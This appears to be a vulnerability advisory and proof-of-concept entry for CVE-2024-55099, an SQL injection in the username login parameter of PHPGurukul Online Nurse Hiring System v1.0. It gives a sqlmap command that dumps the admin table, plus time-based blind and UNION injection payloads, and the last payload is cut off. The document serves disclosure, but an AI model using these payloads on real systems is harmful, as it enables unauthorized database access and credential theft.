POC详情: d292c2748732b764d4c60bdeb49771f8259d9229

标题: PHPGurukul Online Nurse Hiring System 安全漏洞 (CVE-2024-55099)
描述:PHPGurukul Online Nurse Hiring System是PHPGurukul公司的一个在线护士招聘系统。 PHPGurukul Online Nurse Hiring System v1.0版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许远程攻击者通过username参数执行任意SQL命令以获取未经授权的数据库访问权限。
# CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability
+ Exploit Author: ugurkarakoc
# Vendor Homepage
+ https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
# Software Link
+ https://phpgurukul.com/?sdm_process_download=1&download_id=17826
# Overview
+ Online-Nurse-Hiring-System-v1.0 is Insufficient input validation and sanitization of 'username' parameters can create a vulnerability to SQL injection attacks, enabling unauthorized access to the database and compromising system security.
# Vulnerability Details
+ CVE ID: CVE-2024-55099
+ Affected Version: Online-Nurse-Hiring-System-v1.0
+ Vulnerable File: /admin/index.php.
+ Parameter Names: username
+ Attack Type: Local
# References:
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
+ https://nvd.nist.gov/vuln/detail/CVE-2024-55099
# Description
+ The lack of proper input validation and sanitization on the 'username' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

# Proof of Concept (PoC) : 
+ `sqlmap -r r.txt -dbs  --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump`

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e


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